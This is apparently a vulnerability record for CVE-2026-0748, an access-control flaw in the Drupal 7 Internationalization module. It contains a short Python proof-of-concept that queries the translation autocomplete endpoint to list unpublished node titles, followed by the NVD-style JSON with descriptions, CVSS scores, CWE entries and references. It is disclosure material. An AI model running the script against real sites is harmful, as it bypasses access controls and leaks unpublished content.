CVE-2026-0748

#!/usr/bin/env python3 # Proof of Concept for CVE-2026-0748 # This script demonstrates information disclosure via the autocomplete endpoint. import requests target_url = "http://drupal-site.example.com" # The specific endpoint might vary based on i18n configuration endpoint = f"{target_url}/i18n/node/autocomplete/translations" # Attacker requires 'Translate content' and 'Administer content translations' permissions session = requests.Session() # Login logic here (cookie or session id) # session.post(f"{target_url}/user/login", data={...}) # Trigger autocomplete to search for unpublished nodes params = { "string": "test" } response = session.get(endpoint, params=params) if response.status_code == 200: print("[+] Potential Leak Detected:") print(response.text) else: print("[-] Request Failed")

{"cve": {"id": "CVE-2026-0748", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:27.100", "lastModified": "2026-04-01T16:22:14.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Drupal 7 Internationalization (i18n) module, the i18n_node submodule allows a user with both \"Translate content\" and \"Administer content translations\" permissions to view and attach unpublished nodes via the translation UI and its autocomplete widget. This bypasses intended access controls and discloses unpublished node titles and IDs. \n\nExploit affects versions 7.x-1.0 up to and including 7.x-1.35."}, {"lang": "es", "value": "En el módulo Internationalization (i18n) de Drupal 7, el submódulo i18n_node permite a un usuario con ambos permisos de 'Traducir contenido' y 'Administrar traducciones de contenido' ver y adjuntar nodos no publicados a través de la interfaz de usuario de traducción y su widget de autocompletado. Esto elude los controles de acceso previstos y revela los títulos e IDs de nodos no publicados. El exploit afecta a las versiones 7.x-1.0 hasta la 7.x-1.35 inclusive."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:internationalization_project:internationalization:*:*:*:*:*:drupal:*:*", "versionStartIncluding": "7.x-1.0", "versionEndIncluding": "7.x-1.35", "matchCriteriaId": "7CA4C6BB-F2EE-4207-95F1-BADE7B086C4F"}]}]}], "references": [{"url": "https://d7es.tag1.com/node/86", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-0748", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-0748?nes-for-drupal-7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}